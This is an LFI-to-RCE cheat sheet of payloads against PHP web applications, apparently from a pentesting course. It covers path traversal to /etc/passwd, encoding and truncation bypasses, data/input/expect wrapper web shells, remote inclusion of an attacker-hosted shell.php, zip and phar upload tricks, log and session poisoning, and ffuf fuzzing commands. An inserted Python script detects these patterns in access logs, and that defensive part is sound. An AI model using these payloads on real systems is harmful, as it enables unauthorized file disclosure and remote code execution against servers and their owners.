# Local File Inclusion
##### Basic LFI
```bash
/index.php?language=/etc/passwd # Basic LFI
/index.php?language=../../../etc/passwd # LFI with path traversal
/index.php?language=/../../../etc/passwd # LFI with name prefix
/index.php?language=./languages/../../../../etc/passwd # LFI with approved path
```
##### LFI Bypasses
```bash
# bypass basic path traversal filter
/index.php?language=....//....//....//....//etc/passwd
# bypass filters with URL encoding
/index.php?language=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
# bypass appended extension with path truncation
/index.php?language=non_existing_directory/../../../etc/passwd/./././.[./ REPEATED ~2048 times]
# Read PHP with base64 filter
/index.php?language=php://filter/read=convert.base64-encode/resource=config
```
# RCE
##### PHP Wrappers
```bash
# RCE with Data wrapper
/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id
# RCE with input wrapper
curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://<SERVER_IP>:<PORT>/index.php?language=php://input&cmd=id"
# RCE with expect wrapper
curl -s "http://<SERVER_IP>:<PORT>/index.php?language=expect://id"
```
##### RFI
```bash
# Host web shell
echo '<?php system($_GET["cmd"]); ?>' > shell.php && python3 -m http.server <LISTENING_PORT>
# Include remote PHP web shell
/index.php?language=http://<OUR_IP>:<LISTENING_PORT>/shell.php&cmd=id
```
##### LFI + Upload
```bash
# Create malicious image
echo 'GIF8<?php system($_GET["cmd"]); ?>' > shell.gif
# Create malicious zip archive 'as jpg'
echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.php
# RCE with malicious uploaded zip
/index.php?language=zip://shell.zip%23shell.php&cmd=id
# Create malicious phar 'as jpg'
php --define phar.readonly=0 shell.php && mv shell.phar shell.jpg
# RCE with malicious uploaded phar
/index.php?language=phar://./profile_images/shell.jpg%2Fshell.txt&cmd=id
```
##### Log Poisoning
```bash
# Read PHP session parameters
/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd
# Poison PHP session with webshell
/index.php?language=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E
# RCE through poisoned PHP session
/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd&cmd=id
# Poison server log
curl -s "http://<SERVER_IP>:<PORT>/index.php" -A '<?php system($_GET["cmd"]); ?>'
# RCE through poisoned server log
/index.php?language=/var/log/apache2/access.log&cmd=id
```
- Apache:
  - Linux: `/var/log/apache2`, `/var/log/apache2/access.log`
  - Windows: `C:\xampp\apache\logs`
- Nginx:
  - Linux: `/var/log/nginx`
  - Windows: `C:\nginx\log`
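
Added example (not part of the original cheat sheet): a defender-side triage script that flags the request patterns listed above when they appear in an Apache/Nginx access log in combined format. The rule names, function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Rules for the decoded request target; patterns mirror the cheat sheet entries.
URL_RULES = {
    "path_traversal": re.compile(r"\.\.[/\\]"),
    "stream_wrapper": re.compile(r"=(?:php|data|expect|zip|phar)://", re.I),
    "remote_include": re.compile(r"=(?:https?|ftp)://", re.I),
    "path_truncation": re.compile(r"(?:/\.){20,}"),
    "sensitive_file": re.compile(
        r"/etc/passwd|/var/lib/php/sessions/sess_|/var/log/(?:apache2|nginx)"),
}
PHP_TAG = re.compile(r"<\?(?:php|=)", re.I)   # checked against the whole line
TARGET = re.compile(r'"[A-Z]+ (\S+) HTTP/')   # request target in the log line

def decode(value, rounds=3):
    """URL-decode until stable so %2e%2e%2f and double encoding normalise."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return the sorted rule names that one access-log line triggers."""
    hits = set()
    match = TARGET.search(line)
    if match:
        target = decode(match.group(1))
        hits.update(n for n, rx in URL_RULES.items() if rx.search(target))
    if PHP_TAG.search(decode(line)):   # covers poisoned User-Agent/Referer
        hits.add("php_code")
    return sorted(hits)

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    r'203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?language=es.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    r'203.0.113.9 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?language=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 900 "-" "curl/8.0"',
    r'203.0.113.9 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?language=php://filter/read=convert.base64-encode/resource=config HTTP/1.1" 200 700 "-" "curl/8.0"',
    r'203.0.113.9 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "<?php system($_GET[\"cmd\"]); ?>"',
    r'203.0.113.9 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php?language=/var/log/apache2/access.log&cmd=id HTTP/1.1" 200 4096 "-" "curl/8.0"',
]

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(classify(entry), entry[:60])
```

A `php_code` hit on a request followed by a `sensitive_file` hit on a log or session path from the same client is the sequence worth alerting on.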
# Fuzzing
```bash
# Fuzz page parameters
ffuf -w /opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?FUZZ=value'
# Fuzz LFI payloads
ffuf -w /opt/useful/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=FUZZ'
# Fuzz webroot path
ffuf -w /opt/useful/SecLists/Discovery/Web-Content/default-web-root-directory-linux.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ/index.php'
# Fuzz server configurations
ffuf -w ./LFI-WordList-Linux:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ'
```
##### Wordlists
```bash
# fuzzing parameters
/usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt
# LFI wordlists
/usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt
# Server Webroot
/usr/share/seclists/Discovery/Web-Content/default-web-root-directory-linux.txt
/usr/share/seclists/Discovery/Web-Content/default-web-root-directory-windows.txt
# Server configurations wordlist for linux
https://raw.githubusercontent.com/DragonJAR/Security-Wordlist/main/LFI-WordList-Linux
# Server configurations wordlist for windows
https://raw.githubusercontent.com/DragonJAR/Security-Wordlist/main/LFI-WordList-Windows
```